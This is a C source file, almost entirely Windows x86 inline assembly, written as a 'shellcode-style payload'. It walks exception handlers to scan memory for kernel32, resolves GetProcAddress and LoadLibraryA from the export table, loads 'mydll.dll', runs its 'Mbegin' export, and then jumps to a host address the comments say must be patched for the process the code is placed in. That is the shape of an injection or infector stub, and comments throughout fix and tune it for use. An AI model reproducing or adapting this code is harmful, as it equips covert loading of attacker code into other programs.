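/*
 * Find kernel32!GetProcAddress from inside a structured-exception handler by
 * probing candidate module bases and parsing the PE export table, then use it
 * to resolve LoadLibraryA, load "mydll.dll" and call its export "Mbegin".
 *
 * Target: 32-bit x86 Windows, MSVC inline asm (Intel syntax). This is a
 * shellcode-style payload rather than portable C, and it depends on several
 * things the listing itself cannot guarantee:
 *
 *  - Module discovery is a brute-force scan: imgbase steps by 0x10000 starting
 *    at 0x77010000, jumps to 0xBFF00000 when it reaches 0x78000000 (the Win9x
 *    kernel32 range), and relies on every unmapped probe faulting back into
 *    this same handler while its record is still installed. It therefore only
 *    finds kernel32 when it is mapped in those ranges (no ASLR), and the
 *    handler record lives on the stack and never returns to the dispatcher,
 *    so SafeSEH/SEHOP-era systems are out of scope. The loop has no upper
 *    bound despite the original `imgbase<0xff000000` comment; a miss keeps
 *    faulting until the never-unwound dispatcher frames exhaust the stack.
 *  - All state lives in slots below main's ebp although main declares no
 *    locals. Whether [ebp-0x08..-0x24], the name buffer at [ebp-0x124] and
 *    the pointer cache at [ebp-0x4008..-0x4030] are free stack depends on the
 *    compiler's frame layout: the SEH record is pushed at the current esp,
 *    which must lie below [ebp-0x24] or the record overlaps the scratch
 *    slots. TODO confirm for the build actually used.
 *  - `add ecx,34h` hard-codes the encoded byte length of the instructions
 *    between the `call ex` return point and the handler block. Do not change
 *    any instruction in that range (including the 5-byte `mov edx,0`)
 *    without re-counting the bytes.
 *  - main never returns: it ends with `jmp 0x401000`, a host-specific address
 *    that must be patched for the process this code is placed in.
 *  - "mydll.dll" is loaded by relative name, i.e. through the normal DLL
 *    search order of the host process.
 *
 * Fix vs. the original listing: AddressOfNameOrdinals holds unbiased indexes
 * into AddressOfFunctions, so the original `k += Base - 1` step was wrong for
 * any export Base other than 1 (it only appeared to work because the
 * kernel32 export directory uses Base == 1 in practice). The ordinal is now
 * used directly. The NumberOfNames compare is also unsigned (`jae`), since
 * that field is a DWORD.
 */
#include <stdio.h>
#include <windows.h>

/*
 * Scratch-slot map (all relative to main's ebp):
 *   [ebp-0x00]   saved previous fs:[0]  (this overwrites the caller's saved
 *                ebp; tolerable only because main never returns)
 *   [ebp-0x04]   saved previous fs:[4]  (TEB StackBase, borrowed to hand ebp
 *                to the handler)
 *   [ebp-0x08]   procgetadd: 0 while searching, else GetProcAddress VA
 *   [ebp-0x0c]   imgbase: candidate module base
 *   [ebp-0x10]   fnbase: VA of IMAGE_EXPORT_DIRECTORY
 *   [ebp-0x14]   k: scratch pointer / export index
 *   [ebp-0x18]   l: export-name loop counter
 *   [ebp-0x24]   base of the module that matched (kernel32)
 *   [ebp-0x124]  16-byte ASCIIZ name buffer
 *   [ebp-0x4008] GetProcAddress, [ebp-0x400c] LoadLibraryA, [ebp-0x4030] Mbegin
 */
int main(void)
{
    /* Install the handler record and fault into it. */
    _asm {
        call ex                         // ecx = address of the next instruction
        mov eax,0x77000000              // imgbase; first probe is imgbase+0x10000
        mov [ebp-0ch],eax
        mov eax,esp
        sub eax,8                       // the two pushes below build the record at esp-8
        xchg fs:[0],eax                 // fs:[0] = &record, eax = previous record
        mov DWORD ptr[ebp-00h],eax      // remember previous fs:[0]
        mov eax,fs:[4]
        mov DWORD ptr[ebp-04h],eax      // remember previous fs:[4]
        mov fs:[4h],ebp                 // stash ebp where the handler can reload it
                                        // (ebp stays above the record, so the
                                        // dispatcher's StackBase check should still pass - verify)
        add ecx,34h                     // handler address = return point + 0x34 bytes
        push ecx                        // record.Handler
        push eax                        // record.Next = previous record
        mov edx,0                       // keep this 5-byte form: it is counted in 0x34
        mov byte ptr [edx],0            // write to NULL: first entry into the handler
    }

    /* Exception handler. Entered on the NULL write above and again on every
     * unmapped probe; the search state is recovered from ebp (via fs:[4])
     * on each entry. */
    _asm {
        mov ebp,fs:[4]
        mov dword ptr [ebp-8h],0        // procgetadd = 0
        // for (;; imgbase += 0x10000) while procgetadd == 0
    e104f:
        cmp dword ptr [ebp-8h],0
        jne exi
        mov eax,[ebp-0ch]
        add eax,10000h                  // imgbase += 0x10000
        mov [ebp-0ch],eax
        cmp dword ptr [ebp-0ch],78000000h
        jne is44
        mov dword ptr [ebp-0ch],0BFF00000h   // skip to the Win9x kernel32 range
    is44:
        // if (*(WORD*)imgbase != "MZ") continue;   (faults if unmapped)
        mov ecx,dword ptr [ebp-0ch]
        xor edx,edx
        mov dx,word ptr [ecx]
        mov dword ptr [ebp-24h],ecx     // remember the candidate; final value is kernel32
        cmp edx,5A4Dh                   // "MZ"
        jne e11db
        // if (*(WORD*)(imgbase + e_lfanew) != "PE") continue;
        mov eax,[ebp-0ch]
        mov ecx,dword ptr [eax+3Ch]     // e_lfanew
        mov edx,dword ptr [ebp-0ch]
        xor eax,eax
        mov ax,word ptr [edx+ecx]
        cmp eax,4550h                   // "PE"
        jne e11db
        // fnbase = imgbase + DataDirectory[EXPORT].VirtualAddress (PE32: NT hdr + 0x78)
        mov ecx,dword ptr [ebp-0ch]
        mov edx,dword ptr [ecx+3Ch]
        mov eax,[ebp-0ch]
        mov ecx,dword ptr [eax+edx+78h]
        add ecx,dword ptr [ebp-0ch]
        mov dword ptr [ebp-10h],ecx
        // k = imgbase + ExportDirectory.Name (+0x0c)
        mov edx,dword ptr [ebp-10h]
        mov eax,dword ptr [edx+0Ch]
        add eax,dword ptr [ebp-0ch]
        mov dword ptr [ebp-14h],eax
        // if (memcmp(k, "KERNEL32", 8) != 0) continue;
        mov ecx,dword ptr [ebp-14h]
        cmp dword ptr [ecx],4E52454Bh   // "KERN"
        jne e11db
        mov edx,dword ptr [ebp-14h]
        cmp dword ptr [edx+4],32334C45h // "EL32"
        jne e11db
        // k = imgbase + AddressOfNames (+0x20)
        mov eax,dword ptr [ebp-10h]
        mov ecx,dword ptr [ebp-0ch]
        add ecx,dword ptr [eax+20h]
        mov dword ptr [ebp-14h],ecx
        // for (l = 0; l < NumberOfNames (+0x18); ++l, k += 4)
        mov dword ptr [ebp-18h],0
        jmp e1127
    e1115:
        mov edx,dword ptr [ebp-18h]
        add edx,1
        mov dword ptr [ebp-18h],edx
        mov eax,dword ptr [ebp-14h]
        add eax,4
        mov dword ptr [ebp-14h],eax
    e1127:
        mov ecx,dword ptr [ebp-10h]
        mov edx,dword ptr [ebp-18h]
        cmp edx,dword ptr [ecx+18h]
        jae e11db                       // unsigned: NumberOfNames is a DWORD
        // if (memcmp(imgbase + names[l], "GetProcA", 8) != 0) continue;
        // Only an 8-byte prefix is compared; the first match in name order wins.
        mov eax,dword ptr [ebp-14h]
        mov ecx,dword ptr [eax]
        mov edx,dword ptr [ebp-0ch]
        cmp dword ptr [edx+ecx],'PteG'
        jne e11d6
        mov eax,dword ptr [ebp-14h]
        mov ecx,dword ptr [eax]
        mov edx,dword ptr [ebp-0ch]
        cmp dword ptr [edx+ecx+4],'Acor'
        jne e11d6
        // k = ordinals[l]   (WORD at imgbase + AddressOfNameOrdinals (+0x24) + 2*l)
        // This is already a zero-based index into AddressOfFunctions; do not
        // add Base-1 to it (the original listing did, which is only correct
        // when Base == 1).
        mov eax,dword ptr [ebp-18h]
        add eax,dword ptr [ebp-18h]
        add eax,dword ptr [ebp-0ch]
        mov ecx,dword ptr [ebp-10h]
        mov edx,dword ptr [ecx+24h]
        xor ecx,ecx
        mov cx,word ptr [eax+edx]
        mov dword ptr [ebp-14h],ecx
        // k = functions[k]   (DWORD RVA at imgbase + AddressOfFunctions (+0x1c) + 4*k)
        mov eax,dword ptr [ebp-14h]
        add eax,dword ptr [ebp-14h]
        add eax,dword ptr [ebp-14h]
        add eax,dword ptr [ebp-14h]
        add eax,dword ptr [ebp-0ch]
        mov ecx,dword ptr [ebp-10h]
        mov edx,dword ptr [ecx+1Ch]
        mov eax,dword ptr [eax+edx]
        mov dword ptr [ebp-14h],eax
        mov edx,dword ptr [ebp-14h]
        add edx,dword ptr [ebp-0ch]     // RVA -> VA
        mov dword ptr [ebp-8h],edx      // procgetadd = GetProcAddress
        // Found: put the original SEH chain and StackBase back, then leave the
        // loop via e104f. The dispatcher frames below us are simply abandoned.
        mov eax,DWORD ptr[ebp-00h]
        mov fs:[0],eax
        mov eax,DWORD ptr[ebp-04h]
        mov fs:[4],eax
        jmp e11db
    e11d6:
        jmp e1115
    e11db:
        jmp e104f
    }

exi:
    /* LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA") */
    _asm {
        mov dword ptr [ebp-124h],'daoL'
        mov dword ptr [ebp-120h],'rbiL'
        mov dword ptr [ebp-11Ch],'Ayra'
        mov dword ptr [ebp-118h],0000h  // "LoadLibraryA" + NUL
        lea eax,[ebp-124h]
        push eax                        // lpProcName
        mov ebx,dword ptr [ebp-24h]     // kernel32 base
        push ebx                        // hModule
        mov eax,dword ptr [ebp-8h]
        mov dword ptr [ebp-4008h],eax   // cache GetProcAddress
        call eax                        // __stdcall: callee pops the two args
        mov dword ptr [ebp-400ch],eax   // cache LoadLibraryA
    }

    /* h = LoadLibraryA("mydll.dll");
     * if (h) { f = GetProcAddress(h, "Mbegin"); if (f) f(); } */
    _asm {
        mov dword ptr [ebp-124h],'ldym'
        mov dword ptr [ebp-120h],'ld.l'
        mov dword ptr [ebp-11Ch],'l'    // "mydll.dll" + NUL
        mov dword ptr [ebp-118h],0000h
        lea eax,[ebp-124h]
        push eax
        call dword ptr [ebp-400ch]
        cmp eax,0
        jz exit1                        // load failed: no module handle
        mov ebx,eax
        mov dword ptr [ebp-124h],'gebM'
        mov dword ptr [ebp-120h],'ni'   // "Mbegin" + NUL (not "mybegin")
        mov dword ptr [ebp-11Ch],0000h
        mov dword ptr [ebp-118h],0000h
        lea eax,[ebp-124h]
        push eax
        push ebx
        call dword ptr [ebp-4008h]
        mov dword ptr [ebp-4030h],eax   // cache Mbegin
        cmp eax,0
        jz exit1                        // export missing
        call eax                        // Mbegin(); no arguments are passed
        jmp exit1
    }

ex:
    /* Helper for `call ex`: return with ecx = the caller's return address. */
    _asm {
        pop ecx
        push ecx
        ret
    }

exit1:
    /* Hand control to the host program. 0x401000 is a placeholder that must be
     * patched to the real continuation address for the target binary. */
    _asm {
        mov eax,0x401000
        jmp eax
    }
    return 0;   /* unreachable */
}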